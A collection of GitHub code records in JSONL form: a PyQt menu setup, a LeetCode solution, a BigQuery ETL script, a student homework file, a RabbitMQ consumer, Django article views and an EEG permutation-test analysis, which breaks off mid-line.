placeholder.triggered.connect(lambda: OpenFile(self))\n filemenu.addSeparator()\n placeholder = filemenu.addAction('Add Metadata')\n placeholder.triggered.connect(lambda: OpenMetadata(self))\n placeholder = filemenu.addAction('Clear Metadata')\n placeholder.triggered.connect(lambda: ResetMetadata(self))\n filemenu.addSeparator()\n placeholder = filemenu.addAction('Data Manager')\n placeholder.triggered.connect(lambda: OpenDataManager(self))\n\n exportmenu = menubar.addMenu('Export')\n placeholder = exportmenu.addAction('Export Data Structure')\n placeholder.triggered.connect(lambda: Export(self))\n\n edfreadermenu = menubar.addMenu('EDF Reader')\n placeholder = edfreadermenu.addAction('Change EDF Reader trial separator')\n placeholder.triggered.connect(lambda: ChangeEDFReaderStart(self))\n placeholder = edfreadermenu.addAction('Change EDF Reader events')\n placeholder.triggered.connect(lambda: ChangeEDFReaderEvents(self))\n\n presetmenu = menubar.addMenu('Preset')\n placeholder = presetmenu.addAction('Save Preset')\n placeholder.triggered.connect(lambda: SavePreset(self))\n placeholder = presetmenu.addAction('Load Preset')\n placeholder.triggered.connect(lambda: LoadPreset(self))\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\n# Create the parser\n#my_parser = argparse.ArgumentParser(description='List the content of a folder')\n\n# Add the arguments\n#my_parser.add_argument('-n',\n# action=\"store_true\"\n# help='Activate the nogui option')\n\n# Execute the parse_args() method\n#args = my_parser.parse_args()\n#if args.nogui:\n# print('YES')\napp = QApplication(sys.argv)\nex = MainWindow()\nex.show()\nsys.exit(app.exec_())\n","repo_name":"tprzybyl/preprogui","sub_path":"PReProGui.py","file_name":"PReProGui.py","file_ext":"py","file_size_in_byte":39645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21149625474","text":"class Solution:\n def numberOfWeakCharacters(self, properties: List[List[int]]) -> int:\n # Time Complexity: O(N log N)\n # Space Complexity: O(N)\n\n properties.sort(key=lambda prop: (prop[0], -prop[1]))\n frontier = []\n ret = 0\n\n for att, defend in properties:\n # Add point to frontier:\n if frontier and frontier[-1][0] == att:\n cnt = 1\n stack = frontier[-1][1]\n\n while stack and stack[-1][0] <= defend:\n cnt += stack.pop()[1]\n\n stack.append((defend, cnt))\n else:\n frontier.append((att, [(defend, 1)]))\n\n top_stack = frontier.pop()\n\n while frontier:\n cand_stack = frontier[-1][1]\n\n if not cand_stack:\n frontier.pop()\n elif cand_stack[-1][0] >= defend:\n break\n else:\n ret += cand_stack.pop()[1]\n\n # re-add top-of-frontier\n frontier.append(top_stack)\n\n return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1996. The Number of Weak Characters in the Game/Solution2.py","file_name":"Solution2.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"1544649991","text":"################################## Data Pipeline Google Cloud Platform to Python ####################################### \r\n\r\n#Process de connexion des données Google Analytics importées dans GCP BigQuery Storage avec une interface Python \r\n#afin de soumettre ces données requêtées à des méthodes d'analyses exploratoires non réalisables en langage SQL\r\n\r\nimport os; os.chdir('C:/Users/marvin/Desktop/SQL BigQuery')\r\n\r\nimport numpy as np ; import pandas as pd ; from google.cloud import bigquery\r\n\r\n#Création d'un compte de service GCP : https://cloud.google.com/docs/authentication/production\r\n#Authentification du compte dans Python en ajouant lien du fichier JSON téléchargé en local après la creation de la clé\r\n\r\nclient = bigquery.Client.from_service_account_json(\r\njson_credentials_path='data_pipeline-bbc9aec8eae9.json', \r\nproject='data_pipeline')\r\n\r\n#Requête SQL\r\n\r\nquery = \"\"\"\r\nSELECT fullvisitorid AS ID_Visitor,SUM(totals.visits) AS Visits \r\nFROM `bigquery-public-data.google_analytics_sample.ga_sessions_*` \r\nGROUP BY fullvisitorid ORDER BY Visits DESC \"\"\"\r\n\r\nquery_results = client.query(query) ; query_results = query_results.result()\r\n\r\n#Table des résultats \r\nID_Visitor = [] ; Visits = []\r\n\r\nfor row in query_results: \r\n ID_Visitor.append(row[0]) \r\n Visits.append(row[1])\r\n\r\nBigQuery_table = { 'ID_Visitor' : ID_Visitor, 'Visits' : Visits } ; BigQuery_table = pd.DataFrame(BigQuery_table)\r\n\r\n#Cette table va pouvoir être soumise à des tests statistiques ou des modèles de machine learning afin d'effectuer \r\n#par exemple de l'A/B testing ou des analyses predictives (conf repositories Data-Mining & Machine Learning)\r\n\r\n#Après analyses, export des résultats vers Google Cloud Platform BigQuery Storage \r\n#afin de mieux les visualiser sur des outils BI de Data Visualisation comme Tableau ou Data Studio\r\nfrom pandas.io import gbq\r\nBigQuery_table.to_gbq(destination_table='test.BigQuery_table', project_id='data_pipeline', if_exists='replace')\r\n#copier coller le code d'autorisation dans la console\r\n","repo_name":"MarvinEdorh/Data-Engineering","sub_path":"ETL_Python_BigQuery.py","file_name":"ETL_Python_BigQuery.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70601292268","text":"##################################################### \n# CS 31, Prof. Muldrow\n# Name: Jhon Trujillo\n# Assignment: Ch2_HW\n# Due Date: 02.21.21\n# ####################################################\n\n# 12. Stock Transaction Program\n\nnum_Shares = 2000 # num of stocks purchased\nstock_Price = 40.00\npurchase_Amount = num_Shares * stock_Price \np_commission = purchase_Amount * 0.03 # stock purchase commission\nnet_Purchase = purchase_Amount - p_commission\n\n ## two weeks later..\n\nsell_Price = 42.75 # stock price per share sold\nsell_Amount = num_Shares * sell_Price\ns_commission = (num_Shares * sell_Price) * 0.03\n\nprint(f'Total Amount \"Joe\" paid for the stock: ${purchase_Amount:,.2f}')\nprint(f'Commission Amount \"Joe\" paid for the purchased stock: ${p_commission:,.2f}')\nprint(f'$ Amount sold by \"Joe\" for the stock (pre-commission): ${sell_Amount:,.2f}')\nprint(f'Commission paid for the sold stock: ${s_commission:,.2f}')\n\nnet_Profit = (sell_Amount - purchase_Amount) - (p_commission + s_commission)\nprint(f'Net profit for sold stock (after commissions): ${net_Profit:,.2f}')\n\nif net_Profit > 0:\n print(f\"Joe made a Net Profit of ${net_Profit:,.2f} :D\")\nelse: \n print(\"Joe made NO MONEY$ :(\\n\")\n\n\n# 13. Planting Grapevines\n\nR = float(input(\"Enter length of row (in feet): \"))\nE = float(input(\"Enter the amount of space (in feet), used by an end-post assembly: \"))\nS = float(input(\"Enter the space between the vines (in feet): \"))\n\nV = (R - 2*E)/S\n\nprint(f\"{V:.2f} grapevines fit in this row.\")\nprint()\n\n\n# 14. Compound Interest\n\nP = float(input(\"Enter the amount of the principal originally deposited into account: \"))\nrate = float(input(\"Enter interest rate (as a %): \"))\nr = rate / 100\nn = float(input(\"Enter # of times per year that the interest is compounded (e.g. if interest is compounded monthly; enter 12, if quarterly; enter 4.) \"))\nt = float(input(\"Enter # of years the account will be left to earn interest: \"))\n\nA = P*(1 + (r/n)) ** (n*t)\n\nprint(f\"Total amount of money in the account after {t} year(s): ${A:.2f}\")","repo_name":"amriikk/CS31-Python","sub_path":"HW/Ch2HW.py","file_name":"Ch2HW.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28075407080","text":"\nimport json\nfrom desafio.extensions import cache\nfrom desafio.currency.models import RequestCurrencyQuotationParam\nfrom desafio.currency.services import ServiceQuoteCurrencyPrice\n\n\nclass ConsumerCurrency():\n def __init__(self, channel):\n self.channel = channel\n self.exchange = 'topic_priority'\n self.channel.exchange_declare(\n exchange='topic_priority', exchange_type='topic')\n self.service_currency = ServiceQuoteCurrencyPrice()\n\n def receive_quotation_between_period_and_get_relation_currencys(self, binding_key, queue_name):\n self.channel.queue_declare(queue_name)\n self.channel.queue_bind(exchange=self.exchange,\n queue=queue_name, routing_key=binding_key)\n\n def callback(ch, method, properties, body):\n rq_currency = json.loads(body)\n request_params = RequestCurrencyQuotationParam(\n rq_currency['from_simbol'], rq_currency['to_simbol'],\n rq_currency['initial_date'], rq_currency['final_date'])\n result = self.service_currency.get_relation_ratio_between_currencies_in_given_period(\n request_params)\n key_period_request = f\"{rq_currency['from_simbol']}-{rq_currency['to_simbol']}-{rq_currency['initial_date']}-{rq_currency['final_date']}\"\n\n cache.set(key_period_request, result, timeout=30*60)\n self.channel.basic_ack(delivery_tag=method.delivery_tag)\n\n self.channel.basic_qos(prefetch_count=1)\n self.channel.basic_consume(\n queue=queue_name, on_message_callback=callback)\n print(' [*] Waiting for worker currencys. To exit press CTRL+C')\n\n self.channel.start_consuming()\n","repo_name":"Diego07101985/desafio-cortex","sub_path":"desafio/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71259153388","text":"import os\nmyStr = \"\"\nfor i in range(1, 10):\n # f = open(f\"Assignmet {i}.py\", \"a\")\n # f.write(\"\")\n # f.close()\n # os.rename(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\Assignmet {i}.py\", f\"Assignment {i}.py\")\n MyAssignment = open(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\Assignment {i}.py\", \"r\")\n myStr = myStr +f\"\\n Assignment {i} \\n \\n\" f\"{MyAssignment.read()} \\n \\n\"\n\nAllAssignament = open(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\All Assignment.txt\", \"a\")\nAllAssignament.write(myStr)\n","repo_name":"Dhiraj275/collage-assiginment","sub_path":"Python/Sem 2/FileMaker.py","file_name":"FileMaker.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70510767789","text":"import json\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import render\r\nfrom django.db.models import Sum, Q\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.views.decorators.http import require_POST\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\r\nfrom .models import Article, Author, Author_Article, Journal\r\nfrom .download import search_query, download_article, download_author\r\n\r\n\r\n@csrf_exempt\r\ndef First_author(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponseRedirect('/famine/account/login')\r\n First_authors, journals, default_dict, js_dict, journal_lst, page, order = search_query(request)\r\n if order == '1':\r\n First_authors = First_authors.order_by('-article__pmid')\r\n else:\r\n First_authors = First_authors.order_by('article__pmid')\r\n\r\n if request.GET.get('download') == '1':\r\n output = download_article(First_authors)\r\n response = HttpResponse(content_type='application/vnd.ms-excel')\r\n response['Content-Disposition'] = 'attachment;filename=famine_result.xls'\r\n response.write(output.getvalue())\r\n\r\n return response\r\n\r\n paginator = Paginator(First_authors, 20, 10)\r\n try:\r\n First_authors_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n First_authors_page = paginator.page(1)\r\n except EmptyPage:\r\n First_authors_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/first.html\",\r\n {\"First_authors\": First_authors_page,\r\n \"count\": len(First_authors),\r\n \"journals\": journals,\r\n \"dict\": default_dict,\r\n \"js_dict\": json.dumps(js_dict),\r\n \"journal_lst\": journal_lst[:-2]})\r\n\r\n\r\n@login_required\r\ndef Article_title(request):\r\n articles = Article.objects.all()\r\n paginator = Paginator(articles, 50, 20)\r\n page = request.GET.get('page')\r\n try:\r\n articles_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n articles_page = paginator.page(1)\r\n except EmptyPage:\r\n articles_page = paginator.page(paginator.num_pages)\r\n return render(request, \"Article/titles.html\",\r\n {\"articles\": articles_page, \"count\": len(articles)})\r\n\r\n\r\n@login_required\r\ndef Article_detail(request, article_pmid):\r\n article = Article.objects.get(pmid=article_pmid)\r\n ranks = Author_Article.objects.filter(article=article_pmid)\r\n return render(request, \"Article/content.html\",\r\n {\"article\": article, \"ranks\": ranks})\r\n\r\n@csrf_exempt\r\n@login_required\r\ndef Author_detail(request, author_id):\r\n author = Author.objects.get(id=author_id)\r\n articles = Author_Article.objects.filter(author=author_id)\r\n if request.method == 'GET':\r\n articles_for_score = articles.filter(Q(first='Yes') | Q(cofirst='Yes'))\r\n score = 0\r\n for article in articles_for_score:\r\n score += article.article.journal.ifactor\r\n\r\n return render(request, \"Article/author.html\",\r\n {\"author\": author, \"articles\": articles, \"score\": score})\r\n\r\n if request.method == 'POST':\r\n email = request.POST.get('email')\r\n if email == 'None':\r\n email = None\r\n if email:\r\n same_author_obj = Author.objects.filter(~Q(id=author.id), name=author.name, email=email)\r\n if same_author_obj:\r\n same_author = same_author_obj[0]\r\n same_author_articles = Author_Article.objects.filter(author=same_author)\r\n same_author_article = same_author_articles[0]\r\n this_author_articles = Author_Article.objects.filter(author=author)\r\n this_author_article = this_author_articles[0]\r\n if same_author_article.article.pubdate > this_author_article.article.pubdate:\r\n for article in this_author_articles:\r\n article.author = same_author\r\n article.save()\r\n author.delete()\r\n return HttpResponseRedirect('/famine/author/'+str(same_author.id))\r\n else:\r\n for article in same_author_articles:\r\n article.author = author\r\n article.save()\r\n same_author.delete()\r\n return HttpResponseRedirect('/famine/author/'+str(author.id))\r\n else:\r\n author.email = email\r\n author.save()\r\n\r\n return HttpResponseRedirect('/famine/author/'+str(author.id))\r\n\r\n@csrf_exempt\r\n@require_POST\r\n@login_required\r\ndef get_result(request, article_pmid):\r\n cofirst = request.POST.getlist('cofirst')\r\n chinese = request.POST.getlist('chinese')\r\n ranks = Author_Article.objects.filter(article=article_pmid)\r\n cofirst_ = list(str(author.author.id) for author in ranks)\r\n sub = list(i for i in cofirst_ if i not in cofirst)\r\n chinese_sub = list(i for i in cofirst_ if i not in chinese)\r\n author_1 = ranks.get(rank=1)\r\n\r\n for author_id in chinese:\r\n author = Author.objects.get(id=author_id)\r\n author.chinese = 'Yes'\r\n author.save()\r\n\r\n for author_id in chinese_sub:\r\n author = Author.objects.get(id=author_id)\r\n author.chinese = 'No'\r\n author.save()\r\n\r\n if len(cofirst) > 1:\r\n author_1.cofirst = 'Yes'\r\n author_1.save()\r\n for author_id in cofirst:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = 'Yes'\r\n author.save()\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = None\r\n author.save()\r\n elif len(cofirst) == 1:\r\n author = ranks.get(author=cofirst[0])\r\n if author.first == 'Yes':\r\n author_1.cofirst = None\r\n author_1.save()\r\n else:\r\n author.cofirst = 'Yes'\r\n author.save()\r\n author_1.cofirst = 'Yes'\r\n author_1.save()\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = None\r\n author.save()\r\n else:\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n author.cofirst = None\r\n author.save()\r\n\r\n return HttpResponseRedirect('/famine/title/'+article_pmid)\r\n\r\n\r\n@login_required\r\ndef journal(request, article_journal_name):\r\n journal = Journal.objects.get(name=article_journal_name)\r\n articles = Article.objects.filter(journal=journal)\r\n article_authors_list = list()\r\n for article in articles:\r\n first_author = Author_Article.objects.get(article=article, first='Yes')\r\n cofirst_author = Author_Article.objects.filter(article=article, cofirst='Yes')\r\n article_authors_list.append([article, first_author, cofirst_author])\r\n\r\n paginator = Paginator(article_authors_list, 20, 10)\r\n page = request.GET.get('page')\r\n try:\r\n article_authors_list_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n article_authors_list_page = paginator.page(1)\r\n except EmptyPage:\r\n article_authors_list_page = paginator.page(paginator.num_pages)\r\n return render(request, \"Article/journal.html\",\r\n {\"article_authors_list\": article_authors_list_page,\r\n \"journal\": journal, \"count\": len(articles)}) \r\n\r\n\r\n@login_required\r\ndef topic(request, article_subject):\r\n articles = Article.objects.filter(subject=article_subject)\r\n article_authors_list = list()\r\n for article in articles:\r\n first_author = Author_Article.objects.get(article=article, first='Yes')\r\n cofirst_author = Author_Article.objects.filter(article=article, cofirst='Yes')\r\n article_authors_list.append([article, first_author, cofirst_author])\r\n\r\n paginator = Paginator(article_authors_list, 20, 10)\r\n page = request.GET.get('page')\r\n try:\r\n article_authors_list_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n article_authors_list_page = paginator.page(1)\r\n except EmptyPage:\r\n article_authors_list_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/topic.html\",\r\n {\"article_authors_list\": article_authors_list_page,\r\n \"article_subject\": article_subject,\r\n \"count\": len(articles)})\r\n\r\n\r\n@csrf_exempt\r\n@login_required\r\ndef author(request):\r\n First_authors, journals, default_dict, js_dict, journal_lst, page, order = search_query(request)\r\n\r\n authors_info = list()\r\n if order == '1':\r\n authors_score = First_authors.values('author').annotate(score=Sum('article__journal__ifactor')).order_by('-score')\r\n else:\r\n authors_score = First_authors.values('author').annotate(score=Sum('article__journal__ifactor')).order_by('score')\r\n for au in authors_score:\r\n author = Author.objects.get(id=au['author'])\r\n score = round(au['score'], 2)\r\n articles = First_authors.filter(author=author)\r\n authors_info.append([author, score, articles])\r\n\r\n if request.GET.get('download') == '1':\r\n output = download_author(authors_info)\r\n response = HttpResponse(content_type='application/vnd.ms-excel')\r\n response['Content-Disposition'] = 'attachment;filename=famine_result.xls'\r\n response.write(output.getvalue())\r\n\r\n return response\r\n\r\n paginator = Paginator(authors_info, 20, 10)\r\n try:\r\n authors_info_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n authors_info_page = paginator.page(1)\r\n except EmptyPage:\r\n authors_info_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/score.html\",\r\n {\"authors_info\": authors_info_page,\r\n \"journals\": journals,\r\n \"count\": len(authors_info),\r\n \"dict\": default_dict,\r\n \"js_dict\": json.dumps(js_dict),\r\n \"journal_lst\": journal_lst[:-2]})\r\n","repo_name":"liqiming-whu/FirstAuthor-Mine","sub_path":"Article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75192750186","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 28 13:23:17 2023\n\n@author: claire.dussard\n\"\"\"\n\nimport mne\n\nfrom functions.load_savedData import *\nfrom handleData_subject import createSujetsData\nfrom functions.load_savedData import *\nimport numpy as np\nimport os\nimport pandas as pd\n\nessaisMainSeule,essaisMainIllusion,essaisPendule,listeNumSujetsFinale,allSujetsDispo,listeDatesFinale,SujetsPbNomFichiers,dates,seuils_sujets = createSujetsData()\n\n#pour se placer dans les donnees lustre\nos.chdir(\"../../../../\")\nlustre_data_dir = \"_RAW_DATA\"\nlustre_path = pathlib.Path(lustre_data_dir)\nos.chdir(lustre_path)\n\nliste_rawPathPendule = createListeCheminsSignaux(essaisPendule,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\nliste_rawPathMain = createListeCheminsSignaux(essaisMainSeule,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\nliste_rawPathMainIllusion = createListeCheminsSignaux(essaisMainIllusion,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale,dates)\n\nliste_tfrPendule = load_tfr_data_windows(liste_rawPathPendule,\"\",True)\nliste_tfrMain = load_tfr_data_windows(liste_rawPathMain,\"\",True)\nliste_tfrMainIllusion = load_tfr_data_windows(liste_rawPathMainIllusion,\"\",True)\n\ndef copy_three_tfrs(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion):\n#avoid having to reload from scratch after every ANOVA (instances modified in place)\n liste_tfr_pendule = []\n liste_tfr_main = []\n liste_tfr_mainIllusion = []\n for tfr_p,tfr_m,tfr_mi in zip(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion):\n liste_tfr_pendule.append(tfr_p.copy())\n liste_tfr_main.append(tfr_m.copy())\n liste_tfr_mainIllusion.append(tfr_mi.copy())\n return liste_tfr_pendule,liste_tfr_main,liste_tfr_mainIllusion\n\ndef data_freq_tTest_perm(elec,fmin,fmax,tmin,tmax,liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule):\n mode_baseline = 'logratio'\n n_sujets = len(liste_tfr_pendule)\n baseline = (-3,-1)\n #compute baseline (first because after we crop time)\n for tfr_m,tfr_mi,tfr_p in zip(liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule):\n tfr_m.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n tfr_mi.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n tfr_p.apply_baseline(baseline=baseline, mode=mode_baseline, verbose=None)\n #crop time & frequency\n for tfr_mainI,tfr_main,tfr_pendule in zip(liste_tfr_mainIllusion,liste_tfr_main,liste_tfr_pendule):\n tfr_mainI.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n tfr_main.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n tfr_pendule.crop(tmin = tmin,tmax=tmax,fmin = fmin,fmax = fmax)\n #subset electrode\n for tfr_mainI,tfr_main,tfr_pendule in zip(liste_tfr_mainIllusion,liste_tfr_main,liste_tfr_pendule):\n tfr_mainI.pick_channels([elec])\n tfr_main.pick_channels([elec])\n tfr_pendule.pick_channels([elec])\n #create ANOVA table \"faire evoluer pour plusieurs elecs a la fois\n tableau_mainPendule = np.zeros(shape=(n_sujets,fmax-fmin+1))#23 = nb sujets\n tableau_mainMainIllusion = np.zeros(shape=(n_sujets,fmax-fmin+1))\n tableau_main = np.zeros(shape=(n_sujets,fmax-fmin+1))\n tableau_pendule = np.zeros(shape=(n_sujets,fmax-fmin+1))\n tableau_mainIllusion = np.zeros(shape=(n_sujets,fmax-fmin+1))\n for i in range(n_sujets):#sujets\n print(\"sujet\"+str(i))\n #ecraser forme electrodes\n liste_tfr_pendule[i].data = np.mean(liste_tfr_pendule[i].data,axis=0)\n liste_tfr_main[i].data = np.mean(liste_tfr_main[i].data,axis=0)\n liste_tfr_mainIllusion[i].data = np.mean(liste_tfr_mainIllusion[i].data,axis=0)\n #pool time\n powerFreq_pendule = np.median(liste_tfr_pendule[i].data,axis=1)#OK donc dim = freq x time\n powerFreq_main = np.median(liste_tfr_main[i].data,axis=1)\n powerFreq_mainI = np.median(liste_tfr_mainIllusion[i].data,axis=1)\n print(powerFreq_main)\n mainMoinsPendule_i = powerFreq_main - powerFreq_pendule\n print(mainMoinsPendule_i)\n mainMoinsMainIllusion_i = powerFreq_main - powerFreq_mainI\n for j in range(fmax-fmin+1):#freq\n print(\"freq\"+str(fmin+j))\n tableau_mainPendule[i][j] = mainMoinsPendule_i[j]\n print(mainMoinsPendule_i[j])\n tableau_mainMainIllusion[i][j] = mainMoinsMainIllusion_i[j]\n tableau_main[i][j] = powerFreq_main[j]\n tableau_pendule[i][j] = powerFreq_pendule[j]\n tableau_mainIllusion[i][j] = powerFreq_mainI[j]\n return tableau_mainPendule,tableau_mainMainIllusion,tableau_main,tableau_pendule,tableau_mainIllusion\n\nobj_channels=[\"Fp1\",\"Fp2\",\"F7\",\"F3\",\"Fz\",\"F4\",\"F8\",\"FC5\",\"FC1\",\"FC2\",\"FC6\",\"T7\",\"C3\",\"Cz\",\"C4\",\"T8\",\n\"CP5\",\"CP1\",\"CP2\",\"CP6\",\"P7\",\"P3\",\"Pz\",\"P4\",\"P8\",\"O1\",\"Oz\",\"O2\"]\nliste_pendule = []\nliste_main = []\nliste_mainIllusion = []\n\n#reorder channels\n\nfor elec in obj_channels:\n print(\"ELEC \"+elec)\n liste_tfr_pendule,liste_tfr_main,liste_tfr_mainIllusion = copy_three_tfrs(liste_tfrPendule,liste_tfrMain,liste_tfrMainIllusion)\n tableau_mainPendule,tableau_mainMainIllusion,tableau_main,tableau_pendule,tableau_mainIllusion = data_freq_tTest_perm(elec,3,84,2.5,25.5,liste_tfr_main,liste_tfr_mainIllusion,liste_tfr_pendule)\n liste_mainIllusion.append(tableau_mainIllusion)\n liste_main.append(tableau_main)\n liste_pendule.append(tableau_pendule)\n \n \n \n#now get the p values\ndef get_pvalue_allElec_allFreq(liste_condition,npermut):\n n_sujets = liste_condition[0].shape[0]\n liste_suj_data = []\n for suj in range(n_sujets):\n for elec in range(28):\n print(\"suj\"+str(suj))\n liste_suj_data.append(liste_condition[elec][suj])\n \n fullTableTest_condition = np.zeros(shape=(n_sujets,82*28))\n for i in range(n_sujets):#sujet\n for j in range(28):#electrodes\n fullTableTest_condition[i:i+1,j*82:(j+1)*82] = liste_suj_data[(28*i)+j]\n \n T0, p_values , H0 = mne.stats.permutation_t_test(fullTableTest_condition,npermut)\n significant_freqs = p_values <= 0.05\n print(significant_freqs)\n \n readable_pValue_table = np.zeros(shape=(28,82)) \n for i in range(28):#elec\n for j in range(82):#freq\n readable_pValue_table[i,j] = p_values[(82*i)+j] \n return readable_pValue_table\n\nreadable_pValue_table_pendule = get_pvalue_allElec_allFreq(liste_pendule,20000) \nreadable_pValue_table_main = get_pvalue_allElec_allFreq(liste_main,20000)\nreadable_pValue_table_mainIllusion = get_pvalue_allElec_allFreq(liste_mainIllusion,20000) \n\nheader_row = [\"Channels\\\\freq\"] + list(np.arange(3,85,1)) # Adding an empty cell for the top-left corner\nheader_col = [\"Channels\\\\freq\"] + obj_channels\n\n\n# Creating a DataFrame from the data\ndf_pval_pendule = pd.DataFrame(readable_pValue_table_pendule, index=header_col[1:], columns=header_row[1:])\ndf_pval_main = pd.DataFrame(readable_pValue_table_main, index=header_col[1:], columns=header_row[1:])\ndf_pval_mainIllusion = pd.DataFrame(readable_pValue_table_mainIllusion, index=header_col[1:], columns=header_row[1:])\n\npath = \"C:/Users/claire.dussard/OneDrive - ICM/Bureau/rdom_scriptsData/allElecFreq_VSZero/versionJuin2023_elecFixed/\"\n\ndf_pval_pendule.to_csv(path+\"p_pend.csv\")\ndf_pval_main.to_csv(path+\"p_main.csv\")\ndf_pval_mainIllusion.to_csv(path+\"p_mainIllusion.csv\")\n\n#now get cohen's d\n\ndef get_dcohen_allElec_allFreq(liste_condition):\n ndarray = np.zeros(shape=(28,82))\n for elec in range(28):\n mean = np.mean(liste_condition[elec],axis=0)\n print(mean)\n stdev = np.std(liste_condition[elec],axis=0)\n print(stdev)\n dcohen = mean/stdev\n ndarray[elec]=dcohen\n \n return ndarray\nd_p = get_dcohen_allElec_allFreq(liste_pendule)\nd_m = get_dcohen_allElec_allFreq(liste_main)\nd_mi = get_dcohen_allElec_allFreq(liste_mainIllusion)\n\n# Creating a DataFrame from the data\ndf_d_pendule = pd.DataFrame(d_p, index=header_col[1:], columns=header_row[1:])\ndf_d_main = pd.DataFrame(d_m, index=header_col[1:], columns=header_row[1:])\ndf_d_mainIllusion = pd.DataFrame(d_mi, index=header_col[1:], columns=header_row[1:])\n\ndf_d_pendule.to_csv(path+\"dcohen_pend.csv\")\ndf_d_main.to_csv(path+\"dcohen_main.csv\")\ndf_d_mainIllusion.to_csv(path+\"dcohen_mainIllusion.csv\")\n\n\n#check what we get\npath = \"C:/Users/claire.dussard/OneDrive - ICM/Bureau/rdom_scriptsData/allElecFreq_VSZero/versionJuin2023_elecFixed/\"\n\np_pend = pd.read_csv(path+\"p_pend.csv\").iloc[:, 1:]\np_main = pd.read_csv(path+\"p_main.csv\").iloc[:, 1:]\np_mIll = pd.read_csv(path+\"p_mainIllusion.csv\").iloc[:, 1:]\n\np_pend = p_pend.to_numpy()\np_main = p_main.to_numpy()\np_mIll = p_mIll.to_numpy()\n\npend = pd.read_csv(path+\"dcohen_mainIllusion.csv\").iloc[:, 1:]\nmain = pd.read_csv(path+\"dcohen_main.csv\").iloc[:, 1:]\nmIll = pd.read_csv(path+\"dcohen_pend.csv\").iloc[:, 1:]\n\npend = pend.to_numpy()\nmain = main.to_numpy()\nmIll = mIll.to_numpy()\n\n\nimport imagesc\nimagesc.plot(pend,cmap=\"Blues\")\nimagesc.plot(main,cmap=\"Blues\")\nimagesc.plot(mIll,cmap=\"Blues\")\n\nraw_signal.plot(block=True)\n\npvalue = 0.05/3 \nmasked_p = np.ma.masked_where((p_pend > pvalue) , pend)\nmasked_m = np.ma.masked_where((p_main > pvalue) , main)\nmasked_mi = np.ma.masked_where((p_mIll > pvalue) , mIll)\n\nimagesc.plot(-masked_p,cmap=\"Blues\")\nimagesc.plot(-masked_m,cmap=\"Blues\")\nimagesc.plot(-masked_mi,cmap=\"Blues\")\n\nimport matplotlib.pyplot as plt\nelec_leg = pd.read_csv(path+\"dcohen_mainIllusion.csv\").iloc[:, 0]\ngridspec_kw={'width_ratios': [1,1,1],\n 'height_ratios': [1],\n 'wspace': 0.05,#constrained_layout=True\n 'hspace': 0.05}\nfig, axs = plt.subplots(1,3, sharey=True,sharex=True, figsize=(20, 7),gridspec_kw=gridspec_kw,constrained_layout=True)\nvmin = 0.9\nvmax = 2.1\nimg = axs[0].imshow(-masked_p, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax,label=\"pendulum\")\naxs[0].text(0.12, 1.02, 'Virtual pendulum')\n\naxs[1].imshow(-masked_m, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax)\naxs[1].text(0.12, 1.02, 'Virtual hand')\naxs[2].imshow(-masked_mi, extent=[0, 1, 0, 1],cmap=\"Blues\", aspect='auto',interpolation='none',vmin=vmin,vmax=vmax)\naxs[2].text(0.12, 